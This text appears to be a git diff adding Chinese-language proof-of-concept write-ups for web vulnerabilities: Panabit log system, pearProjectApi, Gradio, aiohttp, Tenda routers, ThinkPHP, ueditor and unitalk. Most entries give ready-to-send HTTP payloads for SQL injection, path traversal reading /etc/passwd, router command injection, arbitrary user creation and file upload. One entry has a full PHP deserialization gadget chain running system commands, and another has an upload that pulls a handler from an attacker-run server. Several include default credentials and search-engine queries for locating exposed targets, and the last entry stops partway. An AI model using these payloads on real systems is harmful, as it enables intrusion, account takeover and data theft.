+panalog为北京派网软件有限公司，一款流量分析，日志分析管理的一款软件。panalog日志审计系统sprog_deletevent存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。
+
+# 二、影响版本
++ Panabit panalog
+
+# 三、资产测绘
++ hunter`app.name="Panabit 日志系统"`
++ 特征
+
+![1699191878681-4fe56d76-6ee5-4a90-af37-1cf8a983f57f.png](./img/NBje5ZQnkKxGETyn/1699191878681-4fe56d76-6ee5-4a90-af37-1cf8a983f57f-759328.png)
+
+# 四、漏洞复现
+```java
+GET /Maintain/sprog_deletevent.php?openid=1&id=1%20or%20updatexml(1,concat(0x7e,(select+user())),0)&cloudip=1 HTTP/1.1
+Host: {hostname}
+Cookie: PHPSESSID=h5inhsqh9heas1lovb1f5kd355
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+```
+
+![1702202129097-d75320e4-8326-46f1-85ac-183a93a23400.png](./img/NBje5ZQnkKxGETyn/1702202129097-d75320e4-8326-46f1-85ac-183a93a23400-648104.png)
+
+```java
+GET /Maintain/sprog_deletevent.php?openid=1&id=1&cloudip=1 HTTP/1.1
+Host: {hostname}
+Cookie: PHPSESSID=h5inhsqh9heas1lovb1f5kd355
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+```
+
+![1702203492043-58bc7c32-9f32-4a11-9ef5-5ba8e08312da.png](./img/NBje5ZQnkKxGETyn/1702203492043-58bc7c32-9f32-4a11-9ef5-5ba8e08312da-650390.png)
+
+
+
+> 更新: 2024-02-29 23:57:14  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bsile5w0tmgnvcvi>
\ No newline at end of file
diff --git a/panabit日志审计系统任意用户创建漏洞和后台命令执行.md b/panabit日志审计系统任意用户创建漏洞和后台命令执行.md
new file mode 100644
index 0000000..9093313
--- /dev/null
+++ b/panabit日志审计系统任意用户创建漏洞和后台命令执行.md
@@ -0,0 +1,57 @@
+# panabit日志审计系统任意用户创建漏洞和后台命令执行
+
+# 一、漏洞简介
+panalog为北京派网软件有限公司，一款流量分析，日志分析管理的一款软件。存在任意用户创建漏洞和后台命令执行漏洞，可先通过任意用户创建，然后进行后台命令执行，获取服务器权限。
+
+# 二、影响版本
++ Panabit panalog
+
+# 三、资产测绘
++ hunter`app.name="Panabit 日志系统"`
++ 特征
+
+![1699191878681-4fe56d76-6ee5-4a90-af37-1cf8a983f57f.png](./img/R_hiEBQ2rdg129pi/1699191878681-4fe56d76-6ee5-4a90-af37-1cf8a983f57f-738731.png)
+
+# 四、漏洞复现
+访问连接出现如下页面表示可能存在漏洞
+
+```plain
+/singleuser_action.php
+```
+
+![1699192303959-b1514c8f-87a3-43de-bcb8-8eaf81585fe8.png](./img/R_hiEBQ2rdg129pi/1699192303959-b1514c8f-87a3-43de-bcb8-8eaf81585fe8-569687.png)
+
+通过POC添加用户
+
+```plain
+POST /singleuser_action.php HTTP/1.1
+Host: xx.xx.xx.xx
+Cookie: PHPSESSID=4dkc7q5hu7lkdlsfm5a0tcirn6
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Dnt: 1
+Upgrade-Insecure-Requests: 1
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 578
+
+
+{ "syncInfo": { "user": { "userId": "110", "userName": "110", "employeeId": "110", "departmentId": "110", "departmentName": "110", "coporationId": "110", "corporationName": "110", "userSex": "1",  "userDuty": "110", "userBirthday": "110", "userPost": "110", "userPostCode": "110", "userAlias": "110", "userRank": "110", "userPhone": "110", "userHomeAddress": "110", "userMobilePhone": "110", "userMailAddress": "110", "userMSN": "110", "userNt": "110", "userCA": "110", "userPwd": "110", "userClass": "110", "parentId": "110", "bxlx": "110" },"operationType": "ADD_USER" } }
+```
+
+![1699192359593-ce854b7d-6a70-4afb-9b8d-8ec24a96b220.png](./img/R_hiEBQ2rdg129pi/1699192359593-ce854b7d-6a70-4afb-9b8d-8ec24a96b220-349214.png)
+
+使用添加的账户`110/110`
+
+![1699192394802-63091860-1fae-479d-bece-9557ffa15489.png](./img/R_hiEBQ2rdg129pi/1699192394802-63091860-1fae-479d-bece-9557ffa15489-628593.png)
+
+执行命令
+
+![1699192639614-2727f7d1-d406-4477-a921-e6d67ca480f9.png](./img/R_hiEBQ2rdg129pi/1699192639614-2727f7d1-d406-4477-a921-e6d67ca480f9-644917.png)
+
+
+
+> 更新: 2024-02-29 23:57:14  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lr43i377pvqttwpn>
\ No newline at end of file
diff --git a/panabit日志审计系统存在弱口令漏洞.md b/panabit日志审计系统存在弱口令漏洞.md
new file mode 100644
index 0000000..4783bab
--- /dev/null
+++ b/panabit日志审计系统存在弱口令漏洞.md
@@ -0,0 +1,25 @@
+# panabit日志审计系统存在弱口令漏洞
+
+# 一、漏洞简介
+panalog为北京派网软件有限公司，一款流量分析，日志分析管理的一款软件。panabit日志审计系统存在弱口令漏洞，攻击者可通过该漏洞获取应用系统权限。
+
+# 二、影响版本
++ Panabit panalog
+
+# 三、资产测绘
++ hunter`app.name="Panabit 日志系统"`
++ 特征
+
+![1699191878681-4fe56d76-6ee5-4a90-af37-1cf8a983f57f.png](./img/xmUcktviOfYVOeI0/1699191878681-4fe56d76-6ee5-4a90-af37-1cf8a983f57f-289266.png)
+
+# 四、漏洞复现
+```plain
+admin/panabit
+```
+
+![1702873135426-bdc33bdf-9af0-4fe3-bb19-3ebed79c5c35.png](./img/xmUcktviOfYVOeI0/1702873135426-bdc33bdf-9af0-4fe3-bb19-3ebed79c5c35-056323.png)
+
+
+
+> 更新: 2024-02-29 23:57:14  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wro15wwfur3dpy3r>
\ No newline at end of file
diff --git a/pearProjectApi系统接口organizationCode存在SQL注入漏洞.md b/pearProjectApi系统接口organizationCode存在SQL注入漏洞.md
new file mode 100644
index 0000000..35171ad
--- /dev/null
+++ b/pearProjectApi系统接口organizationCode存在SQL注入漏洞.md
@@ -0,0 +1,31 @@
+# pearProjectApi系统接口organizationCode存在SQL注入漏洞
+
+## poc
+
+```javascript
+POST /index.php/project/project/selfList HTTP/2
+Host: 
+Cookie: se0d06741=5rkiv0sqvn1otra27va1jlfgfo
+Content-Length: 168
+Sec-Ch-Ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"
+Organizationcode: 6v7be19pwman2fird04gqu53
+Sec-Ch-Ua-Mobile: ?0
+Authorization: bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiIiLCJhdWQiOiIiLCJpYXQiOjE2NzY5NDU0MTAsIm5iZiI6MTY3Njk0NTQxMCwiZGF0YSI6eyJjb2RlIjoiNnY3YmUxOXB3bWFuMmZpcmQwNGdxdTUzIn0sInNjb3BlcyI6ImFjY2VzcyIsImV4cCI6MTY3NzU1MDIxMH0.G18ME7UI0EHAxaTSV751smgNfETb1Q0O0e9mv-6L42I
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Accept: application/json, text/plain, /
+Sec-Ch-Ua-Platform: "macOS"
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+
+delete=0&all=0&page=1&pageSize=20&organizationCode=6v7be19pwman2fird04gqu53'+and+updatexml(1,concat(0x7e,(select+user()),0x7e),1)%23&memberCode=6v7be19pwman2fird04gqu53
+```
+
+![image](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501241002368.png)
+
+## 漏洞来源
+
+- https://github.com/a54552239/pearProjectApi/issues/31
diff --git a/pearProjectApi系统接口projectCode存在SQL注入漏洞.md b/pearProjectApi系统接口projectCode存在SQL注入漏洞.md
new file mode 100644
index 0000000..c586654
--- /dev/null
+++ b/pearProjectApi系统接口projectCode存在SQL注入漏洞.md
@@ -0,0 +1,31 @@
+# pearProjectApi系统接口projectCode存在SQL注入漏洞
+
+## poc
+
+```javascript
+POST /index.php/project/project/getLogBySelfProject HTTP/2
+Host: 
+Cookie: se0d06741=5rkiv0sqvn1otra27va1jlfgfo
+Content-Length: 100
+Sec-Ch-Ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"
+Organizationcode: 6v7be19pwman2fird04gqu53
+Sec-Ch-Ua-Mobile: ?0
+Authorization: bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiIiLCJhdWQiOiIiLCJpYXQiOjE2NzY5NDU0MTAsIm5iZiI6MTY3Njk0NTQxMCwiZGF0YSI6eyJjb2RlIjoiNnY3YmUxOXB3bWFuMmZpcmQwNGdxdTUzIn0sInNjb3BlcyI6ImFjY2VzcyIsImV4cCI6MTY3NzU1MDIxMH0.G18ME7UI0EHAxaTSV751smgNfETb1Q0O0e9mv-6L42I
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Accept: application/json, text/plain, /
+Sec-Ch-Ua-Platform: "macOS"
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+
+page=1&pageSize=123&projectCode=121312312312'+or+updatexml(1,concat(0x7e,(select+user()),0x7e),1)%23
+```
+
+![image](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501241001031.png)
+
+## 漏洞来源
+
+- https://github.com/a54552239/pearProjectApi/issues/32
\ No newline at end of file
diff --git a/pythonGradio插件存在任意文件读取漏洞(CVE-2024-1561).md b/pythonGradio插件存在任意文件读取漏洞(CVE-2024-1561).md
new file mode 100644
index 0000000..e1261c0
--- /dev/null
+++ b/pythonGradio插件存在任意文件读取漏洞(CVE-2024-1561).md
@@ -0,0 +1,44 @@
+# python Gradio插件存在任意文件读取漏洞(CVE-2024-1561)
+
+# 一、漏洞简介
+Gradio是一个开源的Python库，用于创建机器学习模型的交互式界面。它使得展示和测试模型变得简单快捷，无需深入了解复杂的前端技术。广泛应用于数据科学、教育、研究和软件开发领域，尤其适合于快速原型设计、模型验证、演示和教学。Gradio的/component_server接口不正确地允许使用攻击者控制的参数调用`Component`类的任何方法。具体来说，通过利用`Block`类的`move_resource_to_block_cache()`方法，攻击者可以将文件系统上的任何文件复制到临时目录，然后检索它。该漏洞允许未经授权的本地文件读取访问，尤其是当应用程序通过`launch(share=True)`暴露到互联网时，从而允许远程攻击者读取主机机器上的文件。此外，托管在`huggingface.co`上的gradio应用也受到影响，可能导致敏感信息，如存储在环境变量中的API密钥和凭据的泄露。
+
+# 二、影响版本
++ Gradio
+
+# 三、资产测绘
++ fofa`body="__gradio_mode__"`
+
+![1716302666272-e9be2ee3-0f10-483a-a8fa-f8f167765e0b.png](./img/nhqHGDrOPHKgDp7N/1716302666272-e9be2ee3-0f10-483a-a8fa-f8f167765e0b-158980.png)
+
+# 四、漏洞复现
+首席获取components的id值
+
+```plain
+GET /config HTTP/1.1
+Host: 101.35.228.120
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
+```
+
+![1716302792557-a7a11abb-0428-4661-85d9-7ce32a833f24.png](./img/nhqHGDrOPHKgDp7N/1716302792557-a7a11abb-0428-4661-85d9-7ce32a833f24-678576.png)
+
+携带id值将/etc/passwd文件的内容写入临时文件
+
+![1716302852140-3adae7b1-e986-40c4-afd1-3cbd5ff25060.png](./img/nhqHGDrOPHKgDp7N/1716302852140-3adae7b1-e986-40c4-afd1-3cbd5ff25060-659510.png)
+
+读取文件
+
+```plain
+GET /file=/tmp/gradio/4985ef451ed671433e69560a0edc00761e44efab/passwd HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
+Connection: close
+Accept-Encoding: gzip
+```
+
+![1716302894039-110b1ea7-9212-458a-9672-2ea39a58508a.png](./img/nhqHGDrOPHKgDp7N/1716302894039-110b1ea7-9212-458a-9672-2ea39a58508a-950250.png)
+
+
+
+> 更新: 2024-09-05 23:27:24  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/sh67wp3qcrzx75qv>
\ No newline at end of file
diff --git a/pythonaiohttp插件存在目录遍历漏洞(CVE-2024-23334).md b/pythonaiohttp插件存在目录遍历漏洞(CVE-2024-23334).md
new file mode 100644
index 0000000..262790f
--- /dev/null
+++ b/pythonaiohttp插件存在目录遍历漏洞(CVE-2024-23334).md
@@ -0,0 +1,32 @@
+# python aiohttp插件存在目录遍历漏洞(CVE-2024-23334)
+
+# 一、漏洞简介
+aiohttp是一个用于异步网络编程的Python库，支持客户端和服务器端的网络通信。它利用Python的asyncio库来实现异步IO操作，这意味着它可以处理大量并发网络连接，而不会导致线程阻塞或性能下降。aiohttp常用于需要高性能网络通信的应用程序，如高频交易平台、大规模并发API服务等。aiohttp 存在目录遍历漏洞，攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
+
+# 二、影响版本
++ aiohttp
+
+# 三、资产测绘
++ fofa`title=="ComfyUI""`
++ 特征
+
+![1715938367206-7b415001-96a1-4753-b2d7-70e7f087045c.png](./img/SDWMxOF8-pVDuhg2/1715938367206-7b415001-96a1-4753-b2d7-70e7f087045c-685432.png)![1715938382417-9902ed78-678c-48c6-afd7-7e97a699c1e7.png](./img/SDWMxOF8-pVDuhg2/1715938382417-9902ed78-678c-48c6-afd7-7e97a699c1e7-373275.png)
+
+# 四、漏洞复现
+```plain
+GET /static/../../../../../etc/passwd HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
+Connection: close
+Accept: */*
+Accept-Language: en
+Accept-Encoding: gzip
+
+```
+
+![1715938400651-ce4a7892-ff07-45c6-a92a-57220795bfa2.png](./img/SDWMxOF8-pVDuhg2/1715938400651-ce4a7892-ff07-45c6-a92a-57220795bfa2-977848.png)
+
+
+
+> 更新: 2024-09-05 23:27:24  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zaatbgfawgop0f6e>
\ No newline at end of file
diff --git a/tenda路由器WriteFacMac存在远程命令执行漏洞(CVE-2024-10697).md b/tenda路由器WriteFacMac存在远程命令执行漏洞(CVE-2024-10697).md
new file mode 100644
index 0000000..dd1347f
--- /dev/null
+++ b/tenda路由器WriteFacMac存在远程命令执行漏洞(CVE-2024-10697).md
@@ -0,0 +1,30 @@
+# tenda路由器WriteFacMac存在远程命令执行漏洞(CVE-2024-10697)
+
+## fofa
+
+```javascript
+title="Tenda | LOGIN" && country="CN"
+```
+
+## poc
+
+```javascript
+GET /goform/WriteFacMac?mac=`ls%20%3E/webroot/1.txt` HTTP/1.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
+Cache-Control: max-age=0
+Connection: keep-alive
+Host: 
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0
+```
+
+![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501061038061.png)
+
+
+![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501061038043.png)
+
+## 漏洞来源
+
+- https://nvd.nist.gov/vuln/detail/CVE-2024-10697
\ No newline at end of file
diff --git a/thinkphp最新CVE-2024-44902反序列化漏洞.md b/thinkphp最新CVE-2024-44902反序列化漏洞.md
new file mode 100644
index 0000000..3309c97
--- /dev/null
+++ b/thinkphp最新CVE-2024-44902反序列化漏洞.md
@@ -0,0 +1,103 @@
+# thinkphp最新CVE-2024-44902反序列化漏洞
+
+Thinkphp v6.1.3 至 v8.0.4 中存在反序列化漏洞，允许攻击者执行任意代码。
+
+## demo
+
+```php
+<?php
+
+namespace app\controller;
+
+use app\BaseController;
+
+class Index extends BaseController
+{
+    public function index()
+    {
+        unserialize($_GET['x']);
+        return '<style>*{ padding: 0; margin: 0; }</style><iframe src="https://www.thinkphp.cn/welcome?version=' . \think\facade\App::version() . '" width="100%" height="100%" frameborder="0" scrolling="auto"></iframe>';
+    }
+
+    public function hello($name = 'ThinkPHP8')
+    {
+        return 'hello,' . $name;
+    }
+}
+
+```
+
+## poc
+
+```php
+<?php
+namespace think\cache\driver;
+use think\model\Pivot;
+class Memcached{
+    protected $options=[];
+    function __construct()
+    {
+        $this->options["username"]=new Pivot();
+    }
+}
+
+namespace think\model;
+use think\model;
+class Pivot extends Model
+{
+
+}
+
+namespace think;
+abstract class Model{
+    private $data = [];
+    private $withAttr = [];
+    protected $json = [];
+    protected $jsonAssoc = true;
+    function __construct()
+    {
+        $this->data["fru1ts"]=["whoami"];
+        $this->withAttr["fru1ts"]=["system"];
+        $this->json=["fru1ts"];
+    }
+}
+
+namespace think\route;
+use think\DbManager;
+class ResourceRegister
+{
+    protected $registered = false;
+    protected $resource;
+    function __construct()
+    {
+        $this->registered=false;
+        $this->resource=new DbManager();
+    }
+}
+namespace think;
+use think\model\Pivot;
+class DbManager
+{
+    protected $instance = [];
+    protected $config = [];
+    function __construct()
+    {
+        $this->config["connections"]=["getRule"=>["type"=>"\\think\\cache\\driver\\Memcached","username"=>new Pivot()]];
+        $this->config["default"]="getRule";
+    }
+}
+
+use think\route\ResourceRegister;
+$r=new ResourceRegister();
+echo urlencode(serialize($r));
+
+```
+
+![image-20240916205334112](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409162053192.png)
+
+
+
+## 漏洞来源
+
+- https://github.com/fru1ts/CVE-2024-44902
+- https://xz.aliyun.com/t/15582
\ No newline at end of file
diff --git a/ueditor存在SSRF漏洞.md b/ueditor存在SSRF漏洞.md
new file mode 100644
index 0000000..57dc288
--- /dev/null
+++ b/ueditor存在SSRF漏洞.md
@@ -0,0 +1,66 @@
+# ueditor存在SSRF漏洞
+
+### 一、漏洞描述
+ueditor存在SSRF漏洞
+
+### 二、影响版本
+![1720728132194-b3f361fa-461b-41ae-97cf-c3e8d0598b22.png](./img/f5KIX_0DKetAE9TO/1720728132194-b3f361fa-461b-41ae-97cf-c3e8d0598b22-874641.png)
+
+### 三、漏洞复现
+Ueditor路径：
+
+```plain
+/ueditor/
+/ueditor-1.4.3.3/net/
+/ueditor1_4_3_3-utf8-net/utf8-net/
+/utf8-net/
+```
+
+查看版本：
+
+```plain
+/ueditor/ueditor.all.js
+```
+
+SSRF路径
+
+```plain
+/jsp/controller.jsp?action=catchimage&source[]=
+/jsp/getRemoteImage.jsp?upfile=
+/php/controller.php?action=catchimage&source[]=
+```
+
+PHP版本：
+
+```plain
+/ueditor/php/controller.php?action=catchimage&source[]=x.x.x
+```
+
+![1724055281930-a207d66d-0a8b-4a8e-86df-2bc1314aaac4.png](./img/f5KIX_0DKetAE9TO/1724055281930-a207d66d-0a8b-4a8e-86df-2bc1314aaac4-071913.png)
+
+JSP版本：
+
+```plain
+POST /ueditor/jsp/controller.jsp?action=uploadfile&encode=utf-8 HTTP/1.1
+Host: 
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynJAiy5Qly8XpmZmQ
+Content-Length: 323
+
+
+------WebKitFormBoundarynJAiy5Qly8XpmZmQ
+Content-Disposition: form-data; name="upfile"; filename="1.xml"
+Content-Type: image/png
+
+<html>
+<head></head>
+<body>
+<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
+</body>
+</html>
+------WebKitFormBoundarynJAiy5Qly8XpmZmQ--
+```
+
+
+
+> 更新: 2024-09-05 23:24:41  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/nvizlic3zcdfd5rg>
\ No newline at end of file
diff --git a/ueditor存在XSS漏洞.md b/ueditor存在XSS漏洞.md
new file mode 100644
index 0000000..339b0f4
--- /dev/null
+++ b/ueditor存在XSS漏洞.md
@@ -0,0 +1,83 @@
+# ueditor存在XSS漏洞
+
+### 一、漏洞描述
+ueditor存在XSS漏洞
+
+### 二、影响版本
+![1720728132194-b3f361fa-461b-41ae-97cf-c3e8d0598b22.png](./img/35L9MfrjXp4PhD_k/1720728132194-b3f361fa-461b-41ae-97cf-c3e8d0598b22-134145.png)
+
+### 三、漏洞复现
+Ueditor路径：
+
+```plain
+/ueditor/
+/ueditor-1.4.3.3/net/
+/ueditor1_4_3_3-utf8-net/utf8-net/
+/utf8-net/
+```
+
+查看版本：
+
+```plain
+/ueditor/ueditor.all.js
+```
+
+首先点击上传附件，通过burp拦截，修改上传内容
+
+![1724048797908-50f299b7-99a0-4cab-8ede-ea98be75892d.png](./img/35L9MfrjXp4PhD_k/1724048797908-50f299b7-99a0-4cab-8ede-ea98be75892d-144688.png)
+
+```plain
+POST /ueditor/php/controller.php?action=uploadfile&encode=utf-8 HTTP/1.1
+Host: 
+Content-Length: 886
+X_Requested_With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNHZorABX70DBbzax
+Accept: */*
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+
+------WebKitFormBoundaryNHZorABX70DBbzax
+Content-Disposition: form-data; name="id"
+
+WU_FILE_0
+------WebKitFormBoundaryNHZorABX70DBbzax
+Content-Disposition: form-data; name="name"
+
+phphello.jpg
+------WebKitFormBoundaryNHZorABX70DBbzax
+Content-Disposition: form-data; name="type"
+
+image/jpeg
+------WebKitFormBoundaryNHZorABX70DBbzax
+Content-Disposition: form-data; name="lastModifiedDate"
+
+Tue May 28 2024 11:33:15 GMT+0800 (香港标准时间)
+------WebKitFormBoundaryNHZorABX70DBbzax
+Content-Disposition: form-data; name="size"
+
+34
+------WebKitFormBoundaryNHZorABX70DBbzax
+Content-Disposition: form-data; name="upfile"; filename="phphello.xml"
+Content-Type: image/jpeg
+
+<html>
+<head></head>
+<body>
+<something:script xmlns:something="http://www.w3.org/1999/xhtml">
+alert(1);
+</something:script>
+</body>
+</html>
+------WebKitFormBoundaryNHZorABX70DBbzax--
+```
+
+![1724076778474-6a6797d2-45dc-4bc3-897f-c16c48fc61e6.png](./img/35L9MfrjXp4PhD_k/1724076778474-6a6797d2-45dc-4bc3-897f-c16c48fc61e6-816298.png)
+
+![1724055830613-310f0ec5-83c7-490b-ac93-5b1cd5c9a244.png](./img/35L9MfrjXp4PhD_k/1724055830613-310f0ec5-83c7-490b-ac93-5b1cd5c9a244-554733.png)
+
+
+
+> 更新: 2024-09-05 23:24:41  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fn98g15xv4wqohvy>
\ No newline at end of file
diff --git a/ueditor存在任意文件上传漏洞(ASP).md b/ueditor存在任意文件上传漏洞(ASP).md
new file mode 100644
index 0000000..7fdd1cb
--- /dev/null
+++ b/ueditor存在任意文件上传漏洞(ASP).md
@@ -0,0 +1,71 @@
+# ueditor存在任意文件上传漏洞(ASP)
+
+### 一、漏洞描述
+ueditor存在任意文件上传漏洞
+
+### 二、影响版本
+![1720728132194-b3f361fa-461b-41ae-97cf-c3e8d0598b22.png](./img/EWfoqq_KAC_e407D/1720728132194-b3f361fa-461b-41ae-97cf-c3e8d0598b22-254218.png)
+
+### 三、漏洞复现
+Ueditor路径：
+
+```plain
+/ueditor/
+/ueditor-1.4.3.3/net/
+/ueditor1_4_3_3-utf8-net/utf8-net/
+/utf8-net/
+```
+
+将下面内容保存为1.png，上传至vps，开启一个http服务
+
+```plain
+<% @ webhandler language="C#" class="AverageHandler" %> 
+
+using System; 
+using System.Web; 
+
+public class AverageHandler : IHttpHandler 
+{ 
+public bool IsReusable 
+{ get { return true; } } 
+public void ProcessRequest(HttpContext ctx) 
+{ 
+ctx.Response.Write("hello"); 
+} 
+}
+```
+
+```plain
+python3 -m http.server 7788
+```
+
+![1720728231495-e068f2bf-373c-447c-8d8a-150d25672803.png](./img/EWfoqq_KAC_e407D/1720728231495-e068f2bf-373c-447c-8d8a-150d25672803-580779.png)
+
+发送如下请求包
+
+```plain
+POST /ueditor/net/controller.ashx?action=catchimage HTTP/1.1
+Host: 
+Cookie: ASP.NET_SessionId=0mw04qyo4jalkcgevkbdkotv; __RequestVerificationToken=TNLqbzboAbqK2T54GItDL80FA6wOaHCxRbAZAQut2sPldVD0A-AH6sGP2qalhJHbi3hWsr5xFm6876Ry9qflBN0XCyPKxxbxW3LkvPnuK7k1; .AspNet.UCApplicationCookie140400=soA1FErOUkdJQBpnPjyHZHzf2PluHG15CUYnRyqYd1zFQnAZlO2sBfAejgbJrZSp4DlToc1x83M-4FIjJ_9tUAzdhNX4CFrSWMX-Ei0swS4fwQbhx3qUwf1O_2NLM-1GPIqfeobbuEUTDJLkUHAl8QnJ5hHYlVW8l5lAPcPXhC6SgtQ16CyZdkjyA4Ze2EXeZhxnXoaL5MoUPknVb8fifAf707edXAl9C5m1oHr--G0JEXENSsTO5v0XthLL2eKUJMvV-dT4zF9v4P_6yNgNfEYFrxRXOECifw6lG3RHiqd61gHGotFovOTA7gvEvwQKlXjFq773nrkqOH8raEVObyvY8NYy9o8MFx1ugGLvnLMhi_4YblQ62Sf7mR2X8clwCJFEVEeTncPNXHi9c4HAX9b0iOIQ_JVmbWdkl-ZJar59F9eonUySWn5eKSMAhu96EWxGOb33jpmqmVw4j-RDX0O7qB0hsBLasTJHnOJsqlgiQR62SzFciYnB-wdnyu1V
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 17
+
+source[]=http://x:7788/1.png?.ashx
+```
+
+![1720728261799-9905053c-1573-4008-8068-be3cbb0032a0.png](./img/EWfoqq_KAC_e407D/1720728261799-9905053c-1573-4008-8068-be3cbb0032a0-485515.png)
+
+```plain
+/ueditor/net/upload/image/20240712/6385635362820339411030114.ashx
+```
+
+![1720728287383-40ccdb4e-9c26-4d58-8080-637f358a5243.png](./img/EWfoqq_KAC_e407D/1720728287383-40ccdb4e-9c26-4d58-8080-637f358a5243-565362.png)
+
+
+
+> 更新: 2024-09-05 23:24:41  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tkcf54qe88wyd3z2>
\ No newline at end of file
diff --git a/unitalk存在任意用户删除漏洞.md b/unitalk存在任意用户删除漏洞.md
new file mode 100644
index 0000000..17c99aa
--- /dev/null
+++ b/unitalk存在任意用户删除漏洞.md
@@ -0,0 +1,49 @@
+# unitalk存在任意用户删除漏洞
+
+# 一、漏洞简介
+unitalk是一款即时通讯软件，unitalk存在任意用户删除漏洞
+
+# 二、影响版本
++ unitalk
+
+# 三、资产测绘
++ fofa`title="unitalk"`
++ 特征
+
+![1723520849027-9f8e29d4-1ac6-46e0-b014-eb6ac435cc13.png](./img/S4lPrhEtVBKiZ1xe/1723520849027-9f8e29d4-1ac6-46e0-b014-eb6ac435cc13-094725.png)
+
+# 四、漏洞复现
+先获取token
+
+```plain
+POST /unitalk/v1.0/user/getallusers.json HTTP/1.1
+Host: 172.18.14.68:7778
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.35
+Content-Type: application/json;charset=UTF-8
+
+{}
+```
+
